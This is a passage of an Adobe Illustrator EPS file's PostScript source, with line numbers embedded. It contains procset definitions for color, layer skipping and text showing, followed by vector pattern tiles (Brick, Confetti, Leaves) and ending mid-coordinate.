/_if exch ddef 2771 | /_fc 2772 | { 2773 | _lp /fill ne 2774 | { 2775 | _of setoverprint 2776 | _if _gf 1 exch sub setcustomcolor 2777 | /_lp /fill ddef 2778 | } if 2779 | } ddef 2780 | /_pf 2781 | { 2782 | _fc 2783 | _eo {eofill} {fill} ifelse 2784 | } ddef 2785 | /_psf 2786 | { 2787 | _fc 2788 | hvashow 2789 | } ddef 2790 | /_pjsf 2791 | { 2792 | _fc 2793 | hvawidthshow 2794 | } ddef 2795 | /_lp /none ddef 2796 | } def 2797 | /X 2798 | { 2799 | /_gs exch ddef 2800 | findcmykcustomcolor 2801 | /_is exch ddef 2802 | /_sc 2803 | { 2804 | _lp /stroke ne 2805 | { 2806 | _os setoverprint 2807 | _is _gs 1 exch sub setcustomcolor 2808 | /_lp /stroke ddef 2809 | } if 2810 | } ddef 2811 | /_ps 2812 | { 2813 | _sc 2814 | stroke 2815 | } ddef 2816 | /_pss 2817 | { 2818 | _sc 2819 | ss 2820 | } ddef 2821 | /_pjss 2822 | { 2823 | _sc 2824 | jss 2825 | } ddef 2826 | /_lp /none ddef 2827 | } def 2828 | /A 2829 | { 2830 | pop 2831 | } def 2832 | /annotatepage 2833 | { 2834 | userdict /annotatepage 2 copy known {get exec} {pop pop} ifelse 2835 | } def 2836 | /XT { 2837 | pop pop 2838 | } def 2839 | /discard 2840 | { 2841 | save /discardSave exch store 2842 | discardDict begin 2843 | /endString exch store 2844 | gt38? 2845 | { 2846 | 2 add 2847 | } if 2848 | load 2849 | stopped 2850 | pop 2851 | end 2852 | discardSave restore 2853 | } bind def 2854 | userdict /discardDict 7 dict dup begin 2855 | put 2856 | /pre38Initialize 2857 | { 2858 | /endStringLength endString length store 2859 | /newBuff buffer 0 endStringLength getinterval store 2860 | /newBuffButFirst newBuff 1 endStringLength 1 sub getinterval store 2861 | /newBuffLast newBuff endStringLength 1 sub 1 getinterval store 2862 | } def 2863 | /shiftBuffer 2864 | { 2865 | newBuff 0 newBuffButFirst putinterval 2866 | newBuffLast 0 2867 | currentfile read not 2868 | { 2869 | stop 2870 | } if 2871 | put 2872 | } def 2873 | 0 2874 | { 2875 | pre38Initialize 2876 | mark 2877 | currentfile newBuff readstring exch pop 2878 | { 2879 | { 2880 | newBuff endString eq 2881 | { 2882 | cleartomark stop 2883 | } if 2884 | shiftBuffer 2885 | } loop 2886 | } 2887 | { 2888 | stop 2889 | } ifelse 2890 | } def 2891 | 1 2892 | { 2893 | pre38Initialize 2894 | /beginString exch store 2895 | mark 2896 | currentfile newBuff readstring exch pop 2897 | { 2898 | { 2899 | newBuff beginString eq 2900 | { 2901 | /layerCount dup load 1 add store 2902 | } 2903 | { 2904 | newBuff endString eq 2905 | { 2906 | /layerCount dup load 1 sub store 2907 | layerCount 0 eq 2908 | { 2909 | cleartomark stop 2910 | } if 2911 | } if 2912 | } ifelse 2913 | shiftBuffer 2914 | } loop 2915 | } if 2916 | } def 2917 | 2 2918 | { 2919 | mark 2920 | { 2921 | currentfile buffer readline not 2922 | { 2923 | stop 2924 | } if 2925 | endString eq 2926 | { 2927 | cleartomark stop 2928 | } if 2929 | } loop 2930 | } def 2931 | 3 2932 | { 2933 | /beginString exch store 2934 | /layerCnt 1 store 2935 | mark 2936 | { 2937 | currentfile buffer readline not 2938 | { 2939 | stop 2940 | } if 2941 | dup beginString eq 2942 | { 2943 | pop /layerCnt dup load 1 add store 2944 | } 2945 | { 2946 | endString eq 2947 | { 2948 | layerCnt 1 eq 2949 | { 2950 | cleartomark stop 2951 | } 2952 | { 2953 | /layerCnt dup load 1 sub store 2954 | } ifelse 2955 | } if 2956 | } ifelse 2957 | } loop 2958 | } def 2959 | end 2960 | userdict /clipRenderOff 15 dict dup begin 2961 | put 2962 | { 2963 | /n /N /s /S /f /F /b /B 2964 | } 2965 | { 2966 | { 2967 | _doClip 1 eq 2968 | { 2969 | /_doClip 0 ddef _eo {eoclip} {clip} ifelse 2970 | } if 2971 | newpath 2972 | } def 2973 | } forall 2974 | /Tr /pop load def 2975 | /Bb {} def 2976 | /BB /pop load def 2977 | /Bg {12 npop} def 2978 | /Bm {6 npop} def 2979 | /Bc /Bm load def 2980 | /Bh {4 npop} def 2981 | end 2982 | /Lb 2983 | { 2984 | 4 npop 2985 | 6 1 roll 2986 | pop 2987 | 4 1 roll 2988 | pop pop pop 2989 | 0 eq 2990 | { 2991 | 0 eq 2992 | { 2993 | (%AI5_BeginLayer) 1 (%AI5_EndLayer--) discard 2994 | } 2995 | { 2996 | 2997 | /clipForward? true def 2998 | 2999 | /Tx /pop load def 3000 | /Tj /pop load def 3001 | 3002 | currentdict end clipRenderOff begin begin 3003 | } ifelse 3004 | } 3005 | { 3006 | 0 eq 3007 | { 3008 | save /discardSave exch store 3009 | } if 3010 | } ifelse 3011 | } bind def 3012 | /LB 3013 | { 3014 | discardSave dup null ne 3015 | { 3016 | restore 3017 | } 3018 | { 3019 | pop 3020 | clipForward? 3021 | { 3022 | currentdict 3023 | end 3024 | end 3025 | begin 3026 | 3027 | /clipForward? false ddef 3028 | } if 3029 | } ifelse 3030 | } bind def 3031 | /Pb 3032 | { 3033 | pop pop 3034 | 0 (%AI5_EndPalette) discard 3035 | } bind def 3036 | /Np 3037 | { 3038 | 0 (%AI5_End_NonPrinting--) discard 3039 | } bind def 3040 | /Ln /pop load def 3041 | /Ap 3042 | /pop load def 3043 | /Ar 3044 | { 3045 | 72 exch div 3046 | 0 dtransform dup mul exch dup mul add sqrt 3047 | dup 1 lt 3048 | { 3049 | pop 1 3050 | } if 3051 | setflat 3052 | } def 3053 | /Mb 3054 | { 3055 | q 3056 | } def 3057 | /Md 3058 | { 3059 | } def 3060 | /MB 3061 | { 3062 | Q 3063 | } def 3064 | /nc 4 dict def 3065 | nc begin 3066 | /setgray 3067 | { 3068 | pop 3069 | } bind def 3070 | /setcmykcolor 3071 | { 3072 | 4 npop 3073 | } bind def 3074 | /setrgbcolor 3075 | { 3076 | 3 npop 3077 | } bind def 3078 | /setcustomcolor 3079 | { 3080 | 2 npop 3081 | } bind def 3082 | currentdict readonly pop 3083 | end 3084 | end 3085 | setpacking 3086 | %%EndResource 3087 | %%BeginResource: procset Adobe_cshow 2.0 8 3088 | %%Title: (Writing System Operators) 3089 | %%Version: 2.0 8 3090 | %%CreationDate: (1/23/89) () 3091 | %%Copyright: ((C) 1992-1996 Adobe Systems Incorporated All Rights Reserved) 3092 | currentpacking true setpacking 3093 | userdict /Adobe_cshow 14 dict dup begin put 3094 | /initialize 3095 | { 3096 | Adobe_cshow begin 3097 | Adobe_cshow 3098 | { 3099 | dup xcheck 3100 | { 3101 | bind 3102 | } if 3103 | pop pop 3104 | } forall 3105 | end 3106 | Adobe_cshow begin 3107 | } def 3108 | /terminate 3109 | { 3110 | currentdict Adobe_cshow eq 3111 | { 3112 | end 3113 | } if 3114 | } def 3115 | /cforall 3116 | { 3117 | /_lobyte 0 ddef 3118 | /_hibyte 0 ddef 3119 | /_cproc exch ddef 3120 | /_cscript currentfont /FontScript known { currentfont /FontScript get } { -1 } ifelse ddef 3121 | { 3122 | /_lobyte exch ddef 3123 | _hibyte 0 eq 3124 | _cscript 1 eq 3125 | _lobyte 129 ge _lobyte 159 le and 3126 | _lobyte 224 ge _lobyte 252 le and or and 3127 | _cscript 2 eq 3128 | _lobyte 161 ge _lobyte 254 le and and 3129 | _cscript 3 eq 3130 | _lobyte 161 ge _lobyte 254 le and and 3131 | _cscript 25 eq 3132 | _lobyte 161 ge _lobyte 254 le and and 3133 | _cscript -1 eq 3134 | or or or or and 3135 | { 3136 | /_hibyte _lobyte ddef 3137 | } 3138 | { 3139 | _hibyte 256 mul _lobyte add 3140 | _cproc 3141 | /_hibyte 0 ddef 3142 | } ifelse 3143 | } forall 3144 | } def 3145 | /cstring 3146 | { 3147 | dup 256 lt 3148 | { 3149 | (s) dup 0 4 3 roll put 3150 | } 3151 | { 3152 | dup 256 idiv exch 256 mod 3153 | (hl) dup dup 0 6 5 roll put 1 4 3 roll put 3154 | } ifelse 3155 | } def 3156 | /clength 3157 | { 3158 | 0 exch 3159 | { 256 lt { 1 } { 2 } ifelse add } cforall 3160 | } def 3161 | /hawidthshow 3162 | { 3163 | { 3164 | dup cstring 3165 | show 3166 | _hvax _hvay rmoveto 3167 | _hvwb eq { _hvcx _hvcy rmoveto } if 3168 | } cforall 3169 | } def 3170 | /vawidthshow 3171 | { 3172 | { 3173 | dup 255 le 3174 | _charorientation 1 eq 3175 | and 3176 | { 3177 | -90 rotate 3178 | 0 _fontRotateAdjust rmoveto 3179 | cstring 3180 | _hvcx _hvcy _hvwb _hvax _hvay 6 -1 roll awidthshow 3181 | 0 _fontRotateAdjust neg rmoveto 3182 | 90 rotate 3183 | } 3184 | { 3185 | currentpoint 3186 | _fontHeight sub 3187 | exch _hvay sub exch _hvax sub 3188 | 2 index _hvwb eq { exch _hvcy sub exch _hvcx sub } if 3189 | 3 2 roll 3190 | cstring 3191 | dup stringwidth pop 2 div neg _fontAscent neg rmoveto 3192 | show 3193 | moveto 3194 | } ifelse 3195 | } cforall 3196 | } def 3197 | /hvawidthshow 3198 | { 3199 | 6 1 roll 3200 | /_hvay exch ddef 3201 | /_hvax exch ddef 3202 | /_hvwb exch ddef 3203 | /_hvcy exch ddef 3204 | /_hvcx exch ddef 3205 | _lineorientation 0 eq { hawidthshow } { vawidthshow } ifelse 3206 | } def 3207 | /hvwidthshow 3208 | { 3209 | 0 0 3 -1 roll hvawidthshow 3210 | } def 3211 | /hvashow 3212 | { 3213 | 0 0 0 6 -3 roll hvawidthshow 3214 | } def 3215 | /hvshow 3216 | { 3217 | 0 0 0 0 0 6 -1 roll hvawidthshow 3218 | } def 3219 | currentdict readonly pop end 3220 | setpacking 3221 | %%EndResource 3222 | %%EndProlog 3223 | %%BeginSetup 3224 | %%IncludeFont: Helvetica 3225 | %%IncludeFont: Helvetica-Bold 3226 | Adobe_level2_AI5 /initialize get exec 3227 | Adobe_cshow /initialize get exec 3228 | Adobe_Illustrator_AI5_vars Adobe_Illustrator_AI5 Adobe_typography_AI5 /initialize get exec 3229 | Adobe_ColorImage_AI6 /initialize get exec 3230 | Adobe_Illustrator_AI5 /initialize get exec 3231 | [ 3232 | 39/quotesingle 96/grave 128/Adieresis/Aring/Ccedilla/Eacute/Ntilde/Odieresis 3233 | /Udieresis/aacute/agrave/acircumflex/adieresis/atilde/aring/ccedilla/eacute 3234 | /egrave/ecircumflex/edieresis/iacute/igrave/icircumflex/idieresis/ntilde 3235 | /oacute/ograve/ocircumflex/odieresis/otilde/uacute/ugrave/ucircumflex 3236 | /udieresis/dagger/degree/cent/sterling/section/bullet/paragraph/germandbls 3237 | /registered/copyright/trademark/acute/dieresis/.notdef/AE/Oslash 3238 | /.notdef/plusminus/.notdef/.notdef/yen/mu/.notdef/.notdef 3239 | /.notdef/.notdef/.notdef/ordfeminine/ordmasculine/.notdef/ae/oslash 3240 | /questiondown/exclamdown/logicalnot/.notdef/florin/.notdef/.notdef 3241 | /guillemotleft/guillemotright/ellipsis/.notdef/Agrave/Atilde/Otilde/OE/oe 3242 | /endash/emdash/quotedblleft/quotedblright/quoteleft/quoteright/divide 3243 | /.notdef/ydieresis/Ydieresis/fraction/currency/guilsinglleft/guilsinglright 3244 | /fi/fl/daggerdbl/periodcentered/quotesinglbase/quotedblbase/perthousand 3245 | /Acircumflex/Ecircumflex/Aacute/Edieresis/Egrave/Iacute/Icircumflex 3246 | /Idieresis/Igrave/Oacute/Ocircumflex/.notdef/Ograve/Uacute/Ucircumflex 3247 | /Ugrave/dotlessi/circumflex/tilde/macron/breve/dotaccent/ring/cedilla 3248 | /hungarumlaut/ogonek/caron 3249 | TE 3250 | %AI55J_Tsume: None 3251 | %AI3_BeginEncoding: _Helvetica Helvetica 3252 | [/_Helvetica/Helvetica 0 0 1 TZ 3253 | %AI3_EndEncoding AdobeType 3254 | %AI55J_Tsume: None 3255 | %AI3_BeginEncoding: _Helvetica-Bold Helvetica-Bold 3256 | [/_Helvetica-Bold/Helvetica-Bold 0 0 1 TZ 3257 | %AI3_EndEncoding AdobeType 3258 | [161/degree 173/notequal 176/infinity/plusminus/lessequal/greaterequal 3259 | 181/mu/partialdiff/summation/product/pi/integral 189/Omega 3260 | 195/radical 197/approxequal 198/Delta 214/divide/lozenge 240/apple 3261 | /_Symbol_/Symbol 0 0 0 TZ 3262 | %AI5_Begin_NonPrinting 3263 | Np 3264 | %AI3_BeginPattern: (Brick) 3265 | (Brick) 0 0 72 72 [ 3266 | %AI3_Tile 3267 | (0 O 0 R 0.3 0.85 0.85 0 k 3268 | 0.3 0.85 0.85 0 K 3269 | ) @ 3270 | ( 3271 | %AI6_BeginPatternLayer 3272 | 800 Ar 3273 | 0 J 0 j 1 w 4 M []0 d 3274 | %AI3_Note: 3275 | 0 D 3276 | 0 XR 3277 | 0 0 m 3278 | 0 72 L 3279 | 72 72 L 3280 | 72 0 L 3281 | 0 0 L 3282 | f 3283 | %AI6_EndPatternLayer 3284 | ) & 3285 | (0 O 0 R 1 g 3286 | 1 G 3287 | ) @ 3288 | ( 3289 | %AI6_BeginPatternLayer 3290 | 800 Ar 3291 | 0 J 0 j 0.3 w 4 M []0 d 3292 | %AI3_Note: 3293 | 0 D 3294 | 0 XR 3295 | 0 68.4097 m 3296 | 72 68.4097 l 3297 | S 3298 | 0 61.209 m 3299 | 72 61.209 L 3300 | S 3301 | 0 54.0088 m 3302 | 72 54.0088 L 3303 | S 3304 | 0 46.8076 m 3305 | 72 46.8076 L 3306 | S 3307 | 0 39.6084 m 3308 | 72 39.6084 L 3309 | S 3310 | 0 32.4072 m 3311 | 72 32.4072 L 3312 | S 3313 | 0 25.207 m 3314 | 72 25.207 L 3315 | S 3316 | 0 18.0059 m 3317 | 72 18.0059 L 3318 | S 3319 | 0 10.8057 m 3320 | 72 10.8057 L 3321 | S 3322 | 0 3.6064 m 3323 | 72 3.6064 L 3324 | S 3325 | 68.4102 68.4097 m 3326 | 68.4102 61.2217 l 3327 | S 3328 | 54.0098 68.4097 m 3329 | 54.0098 61.2217 L 3330 | S 3331 | 39.6094 68.4097 m 3332 | 39.6094 61.2217 L 3333 | S 3334 | 25.21 68.4097 m 3335 | 25.21 61.2217 L 3336 | S 3337 | 10.8105 68.4097 m 3338 | 10.8105 61.2217 L 3339 | S 3340 | 68.4102 53.9717 m 3341 | 68.4102 46.7842 l 3342 | S 3343 | 54.0098 53.9717 m 3344 | 54.0098 46.7842 L 3345 | S 3346 | 39.6094 53.9717 m 3347 | 39.6094 46.7842 L 3348 | S 3349 | 25.21 53.9717 m 3350 | 25.21 46.7842 L 3351 | S 3352 | 10.8105 53.9717 m 3353 | 10.8105 46.7842 L 3354 | S 3355 | 68.4102 39.5967 m 3356 | 68.4102 32.4092 l 3357 | S 3358 | 54.0098 39.5967 m 3359 | 54.0098 32.4092 L 3360 | S 3361 | 39.6094 39.5967 m 3362 | 39.6094 32.4092 L 3363 | S 3364 | 25.21 39.5967 m 3365 | 25.21 32.4092 L 3366 | S 3367 | 10.8105 39.5967 m 3368 | 10.8105 32.4092 L 3369 | S 3370 | 68.4102 25.2217 m 3371 | 68.4102 18.0342 l 3372 | S 3373 | 54.0098 25.2217 m 3374 | 54.0098 18.0342 L 3375 | S 3376 | 39.6094 25.2217 m 3377 | 39.6094 18.0342 L 3378 | S 3379 | 25.21 25.2217 m 3380 | 25.21 18.0342 L 3381 | S 3382 | 10.8105 25.2217 m 3383 | 10.8105 18.0342 L 3384 | S 3385 | 68.4102 10.7842 m 3386 | 68.4102 3.5967 l 3387 | S 3388 | 54.0098 10.7842 m 3389 | 54.0098 3.5967 L 3390 | S 3391 | 39.6094 10.7842 m 3392 | 39.6094 3.5967 L 3393 | S 3394 | 25.21 10.7842 m 3395 | 25.21 3.5967 L 3396 | S 3397 | 10.8105 10.7842 m 3398 | 10.8105 3.5967 L 3399 | S 3400 | 61.1973 3.5967 m 3401 | 61.1973 0 L 3402 | S 3403 | 46.7969 3.5967 m 3404 | 46.7969 0 L 3405 | S 3406 | 32.3965 3.5967 m 3407 | 32.3965 0 L 3408 | S 3409 | 17.9971 3.5967 m 3410 | 17.9971 0 L 3411 | S 3412 | 3.5967 3.5967 m 3413 | 3.5967 0 l 3414 | S 3415 | 61.1973 18.0342 m 3416 | 61.1973 10.8467 L 3417 | S 3418 | 46.7969 18.0342 m 3419 | 46.7969 10.8467 L 3420 | S 3421 | 32.3965 18.0342 m 3422 | 32.3965 10.8467 L 3423 | S 3424 | 17.9971 18.0342 m 3425 | 17.9971 10.8467 L 3426 | S 3427 | 3.5967 18.0342 m 3428 | 3.5967 10.8467 l 3429 | S 3430 | 61.1973 32.4092 m 3431 | 61.1973 25.2217 L 3432 | S 3433 | 46.7969 32.4092 m 3434 | 46.7969 25.2217 L 3435 | S 3436 | 17.9971 32.4092 m 3437 | 17.9971 25.2217 L 3438 | S 3439 | 3.5967 32.4092 m 3440 | 3.5967 25.2217 l 3441 | S 3442 | 61.1973 46.7842 m 3443 | 61.1973 39.5967 L 3444 | S 3445 | 46.7969 46.7842 m 3446 | 46.7969 39.5967 L 3447 | S 3448 | 32.3965 46.7842 m 3449 | 32.3965 39.5967 L 3450 | S 3451 | 17.9971 46.7842 m 3452 | 17.9971 39.5967 L 3453 | S 3454 | 3.5967 46.7842 m 3455 | 3.5967 39.5967 l 3456 | S 3457 | 61.1973 61.2217 m 3458 | 61.1973 54.0347 L 3459 | S 3460 | 46.7969 61.2217 m 3461 | 46.7969 54.0347 L 3462 | S 3463 | 32.3965 61.2217 m 3464 | 32.3965 54.0347 L 3465 | S 3466 | 17.9971 61.2217 m 3467 | 17.9971 54.0347 L 3468 | S 3469 | 3.5967 61.2217 m 3470 | 3.5967 54.0347 l 3471 | S 3472 | 61.1973 71.959 m 3473 | 61.1973 68.4717 L 3474 | S 3475 | 46.7969 71.959 m 3476 | 46.7969 68.4717 L 3477 | S 3478 | 32.3965 71.959 m 3479 | 32.3965 68.4717 L 3480 | S 3481 | 17.9971 71.959 m 3482 | 17.9971 68.4717 L 3483 | S 3484 | 3.5967 71.959 m 3485 | 3.5967 68.4717 l 3486 | S 3487 | 32.3965 32.4092 m 3488 | 32.3965 25.2217 L 3489 | S 3490 | %AI6_EndPatternLayer 3491 | ) & 3492 | ] E 3493 | %AI3_EndPattern 3494 | %AI3_BeginPattern: (Confetti) 3495 | (Confetti) 4.85 3.617 76.85 75.617 [ 3496 | %AI3_Tile 3497 | (0 O 0 R 1 g 3498 | 1 G 3499 | ) @ 3500 | ( 3501 | %AI6_BeginPatternLayer 3502 | 800 Ar 3503 | 0 J 0 j 1 w 4 M []0 d 3504 | %AI3_Note: 3505 | 0 D 3506 | 0 XR 3507 | 4.85 3.617 m 3508 | 4.85 75.617 L 3509 | 76.85 75.617 L 3510 | 76.85 3.617 L 3511 | 4.85 3.617 L 3512 | f 3513 | %AI6_EndPatternLayer 3514 | ) & 3515 | (0 O 0 R 0 g 3516 | 0 G 3517 | ) @ 3518 | ( 3519 | %AI6_BeginPatternLayer 3520 | 800 Ar 3521 | 0 J 0 j 0.3 w 4 M []0 d 3522 | %AI3_Note: 3523 | 0 D 3524 | 0 XR 3525 | 10.6 64.867 m 3526 | 7.85 62.867 l 3527 | S 3528 | 9.1 8.617 m 3529 | 6.85 6.867 l 3530 | S 3531 | 78.1 68.617 m 3532 | 74.85 67.867 l 3533 | S 3534 | 76.85 56.867 m 3535 | 74.35 55.117 l 3536 | S 3537 | 79.6 51.617 m 3538 | 76.6 51.617 l 3539 | S 3540 | 76.35 44.117 m 3541 | 73.6 45.867 l 3542 | S 3543 | 78.6 35.867 m 3544 | 76.6 34.367 l 3545 | S 3546 | 76.1 23.867 m 3547 | 73.35 26.117 l 3548 | S 3549 | 78.1 12.867 m 3550 | 73.85 13.617 l 3551 | S 3552 | 68.35 14.617 m 3553 | 66.1 12.867 l 3554 | S 3555 | 76.6 30.617 m 3556 | 73.6 30.617 l 3557 | S 3558 | 62.85 58.117 m 3559 | 60.956 60.941 l 3560 | S 3561 | 32.85 59.617 m 3562 | 31.196 62.181 l 3563 | S 3564 | 47.891 64.061 m 3565 | 49.744 66.742 l 3566 | S 3567 | 72.814 2.769 m 3568 | 73.928 5.729 l 3569 | S 3570 | 67.976 2.633 m 3571 | 67.35 5.909 l 3572 | S 3573 | 61.85 27.617 m 3574 | 59.956 30.441 l 3575 | S 3576 | 53.504 56.053 m 3577 | 51.85 58.617 l 3578 | S 3579 | 52.762 1.779 m 3580 | 52.876 4.776 l 3581 | S 3582 | 45.391 5.311 m 3583 | 47.244 7.992 l 3584 | S 3585 | 37.062 3.375 m 3586 | 35.639 5.43 l 3587 | S 3588 | 55.165 34.828 m 3589 | 57.518 37.491 l 3590 | S 3591 | 20.795 3.242 m 3592 | 22.12 5.193 l 3593 | S 3594 | 14.097 4.747 m 3595 | 15.008 8.965 l 3596 | S 3597 | 9.736 1.91 m 3598 | 8.073 4.225 l 3599 | S 3600 | 31.891 5.573 m 3601 | 32.005 8.571 l 3602 | S 3603 | 12.1 70.367 m 3604 | 15.6 68.867 l 3605 | S 3606 | 9.35 54.867 m 3607 | 9.6 58.117 l 3608 | S 3609 | 12.85 31.867 m 3610 | 14.35 28.117 l 3611 | S 3612 | 10.1 37.367 m 3613 | 12.35 41.117 l 3614 | S 3615 | 34.1 71.117 m 3616 | 31.85 68.617 l 3617 | S 3618 | 38.35 71.117 m 3619 | 41.6 68.367 l 3620 | S 3621 | 55.1 71.117 m 3622 | 58.35 69.117 l 3623 | S 3624 | 57.35 65.117 m 3625 | 55.35 61.867 l 3626 | S 3627 | 64.35 66.367 m 3628 | 69.35 68.617 l 3629 | S 3630 | 71.85 62.867 m 3631 | 69.35 61.117 l 3632 | S 3633 | 23.6 70.867 m 3634 | 23.6 67.867 l 3635 | S 3636 | 20.6 65.867 m 3637 | 17.35 65.367 l 3638 | S 3639 | 24.85 61.367 m 3640 | 25.35 58.117 l 3641 | S 3642 | 25.85 65.867 m 3643 | 29.35 66.617 l 3644 | S 3645 | 14.1 54.117 m 3646 | 16.85 56.117 l 3647 | S 3648 | 12.35 11.617 m 3649 | 12.6 15.617 l 3650 | S 3651 | 12.1 19.867 m 3652 | 14.35 22.367 l 3653 | S 3654 | 26.1 9.867 m 3655 | 23.6 13.367 l 3656 | S 3657 | 34.6 47.117 m 3658 | 32.1 45.367 l 3659 | S 3660 | 62.6 41.867 m 3661 | 59.85 43.367 l 3662 | S 3663 | 31.6 35.617 m 3664 | 27.85 36.367 l 3665 | S 3666 | 36.35 26.117 m 3667 | 34.35 24.617 l 3668 | S 3669 | 33.85 14.117 m 3670 | 31.1 16.367 l 3671 | S 3672 | 37.1 9.867 m 3673 | 35.1 11.117 l 3674 | S 3675 | 34.35 20.867 m 3676 | 31.35 20.867 l 3677 | S 3678 | 44.6 56.617 m 3679 | 42.1 54.867 l 3680 | S 3681 | 47.35 51.367 m 3682 | 44.35 51.367 l 3683 | S 3684 | 44.1 43.867 m 3685 | 41.35 45.617 l 3686 | S 3687 | 43.35 33.117 m 3688 | 42.6 30.617 l 3689 | S 3690 | 43.85 23.617 m 3691 | 41.1 25.867 l 3692 | S 3693 | 44.35 15.617 m 3694 | 42.35 16.867 l 3695 | S 3696 | 67.823 31.1 m 3697 | 64.823 31.1 l 3698 | S 3699 | 27.1 32.617 m 3700 | 29.6 30.867 l 3701 | S 3702 | 31.85 55.117 m 3703 | 34.85 55.117 l 3704 | S 3705 | 19.6 40.867 m 3706 | 22.1 39.117 l 3707 | S 3708 | 16.85 35.617 m 3709 | 19.85 35.617 l 3710 | S 3711 | 20.1 28.117 m 3712 | 22.85 29.867 l 3713 | S 3714 | 52.1 42.617 m 3715 | 54.484 44.178 l 3716 | S 3717 | 52.437 50.146 m 3718 | 54.821 48.325 l 3719 | S 3720 | 59.572 54.133 m 3721 | 59.35 51.117 l 3722 | S 3723 | 50.185 10.055 m 3724 | 53.234 9.928 l 3725 | S 3726 | 51.187 15.896 m 3727 | 53.571 14.075 l 3728 | S 3729 | 58.322 19.883 m 3730 | 59.445 16.823 l 3731 | S 3732 | 53.1 32.117 m 3733 | 50.6 30.367 l 3734 | S 3735 | 52.85 24.617 m 3736 | 49.6 25.617 l 3737 | S 3738 | 61.85 9.117 m 3739 | 59.1 10.867 l 3740 | S 3741 | 69.35 34.617 m 3742 | 66.6 36.367 l 3743 | S 3744 | 67.1 23.617 m 3745 | 65.1 22.117 l 3746 | S 3747 | 24.435 46.055 m 3748 | 27.484 45.928 l 3749 | S 3750 | 25.437 51.896 m 3751 | 27.821 50.075 l 3752 | S 3753 | 62.6 47.117 m 3754 | 65.321 46.575 l 3755 | S 3756 | 19.85 19.867 m 3757 | 20.35 16.617 l 3758 | S 3759 | 21.85 21.867 m 3760 | 25.35 22.617 l 3761 | S 3762 | 37.6 62.867 m 3763 | 41.6 62.117 l 3764 | S 3765 | 38.323 42.1 m 3766 | 38.823 38.6 l 3767 | S 3768 | 69.35 52.617 m 3769 | 66.85 53.867 l 3770 | S 3771 | 14.85 62.117 m 3772 | 18.1 59.367 l 3773 | S 3774 | 9.6 46.117 m 3775 | 7.1 44.367 l 3776 | S 3777 | 20.6 51.617 m 3778 | 18.6 50.117 l 3779 | S 3780 | 46.141 70.811 m 3781 | 47.994 73.492 l 3782 | S 3783 | 69.391 40.561 m 3784 | 71.244 43.242 l 3785 | S 3786 | 38.641 49.311 m 3787 | 39.35 52.117 l 3788 | S 3789 | 25.141 16.811 m 3790 | 25.85 19.617 l 3791 | S 3792 | 36.6 32.867 m 3793 | 34.6 31.367 l 3794 | S 3795 | 6.1 68.617 m 3796 | 2.85 67.867 l 3797 | S 3798 | 4.85 56.867 m 3799 | 2.35 55.117 l 3800 | S 3801 | 7.6 51.617 m 3802 | 4.6 51.617 l 3803 | S 3804 | 6.6 35.867 m 3805 | 4.6 34.367 l 3806 | S 3807 | 6.1 12.867 m 3808 | 1.85 13.617 l 3809 | S 3810 | 4.6 30.617 m 3811 | 1.6 30.617 l 3812 | S 3813 | 72.814 74.769 m 3814 | 73.928 77.729 l 3815 | S 3816 | 67.976 74.633 m 3817 | 67.35 77.909 l 3818 | S 3819 | 52.762 73.779 m 3820 | 52.876 76.776 l 3821 | S 3822 | 37.062 75.375 m 3823 | 35.639 77.43 l 3824 | S 3825 | 20.795 75.242 m 3826 | 22.12 77.193 l 3827 | S 3828 | 9.736 73.91 m 3829 | 8.073 76.225 l 3830 | S 3831 | 10.1 23.617 m 3832 | 6.35 24.367 l 3833 | S 3834 | 73.217 18.276 m 3835 | 71.323 21.1 l 3836 | S 3837 | 28.823 39.6 m 3838 | 29.505 42.389 l 3839 | S 3840 | 49.6 38.617 m 3841 | 47.6 37.117 l 3842 | S 3843 | 60.323 73.6 m 3844 | 62.323 76.6 l 3845 | S 3846 | 60.323 1.6 m 3847 | 62.323 4.6 l 3848 | S 3849 | %AI6_EndPatternLayer 3850 | ) & 3851 | ] E 3852 | %AI3_EndPattern 3853 | %AI3_BeginPattern: (Leaves - Fall ) 3854 | (Leaves - Fall ) 0 0 64.0781 78.9336 [ 3855 | %AI3_Tile 3856 | (0 O 0 R 0.05 0.2 1 0 k 3857 | 0.05 0.2 1 0 K 3858 | ) @ 3859 | ( 3860 | %AI6_BeginPatternLayer 3861 | 800 Ar 3862 | 0 J 0 j 1 w 4 M []0 d 3863 | %AI3_Note: 3864 | 0 D 3865 | 0 XR 3866 | 64.0781 78.9336 m 3867 | 64.0781 0 L 3868 | 0 0 L 3869 | 0 78.9336 L 3870 | 64.0781 78.9336 L 3871 | f 3872 | %AI6_EndPatternLayer 3873 | ) & 3874 | (0 O 0 R 0.83 0 1 0 k 3875 | 0.83 0 1 0 K 3876 | ) @ 3877 | ( 3878 | %AI6_BeginPatternLayer 3879 | 800 Ar 3880 | 0 J 0 j 1 w 4 M []0 d 3881 | %AI3_Note: 3882 | 1 D 3883 | 0 XR 3884 | 29.7578 0.9902 m 3885 | 30.4346 1.1914 30.7246 1.3428 V 3886 | 29.2559 4.0547 33.707 8.3359 34.627 9.0762 C 3887 | 35.2275 8.8506 35.3477 6.3184 34.6699 4.9805 C 3888 | 35.5137 5.1035 37.7031 3.7256 38.4609 2.4365 C 3889 | 38.5254 3.125 40.0957 6.0664 40.9219 6.4434 C 3890 | 40.002 6.8408 39.3359 8.3135 38.5742 9.7617 C 3891 | 39.5957 9.9287 40.9961 9.0078 42.4668 8.1025 C 3892 | 42.9814 8.9043 44.3555 9.875 45.6143 10.3916 C 3893 | 44.5264 11.0781 44.0313 11.8203 43.5352 13.2793 C 3894 | 42.4922 12.7139 40.3057 12.5645 39.7764 12.8516 C 3895 | 40.291 13.9648 42.5371 14.5078 43.2676 14.4551 C 3896 | 43.0137 15.3164 42.8652 17.4697 43.0391 20.0625 C 3897 | 41.3789 18.7461 39.834 17.4297 38.1738 17.4883 C 3898 | 38.4434 16.0664 37.8076 14.2607 37.4307 13.7676 C 3899 | 36.8574 14.5117 36.4463 15.3389 36.8008 17.3164 C 3900 | 35.3486 17.8008 34.1113 18.3467 32.7373 19.6045 C 3901 | 32.7373 17.7734 32.166 16.5723 31.2969 15.2959 C 3902 | 32.5576 14.8076 33.8301 13.6045 33.8252 12.5664 C 3903 | 32.9775 12.7178 31.2852 13.4619 30.793 14.4551 C 3904 | 30.0742 13.707 28.3906 12.3984 26.7871 12.3945 C 3905 | 27.9746 11.5391 28.8945 10.5059 28.9893 8.5938 C 3906 | 30.2422 9.5645 32.6953 10.1797 34.0752 9.582 C 3907 | 29.2344 5.3457 29.7031 2.3125 29.7578 0.9902 C 3908 | f 3909 | 13.8525 29.9844 m 3910 | 13.3281 29.5127 13.1309 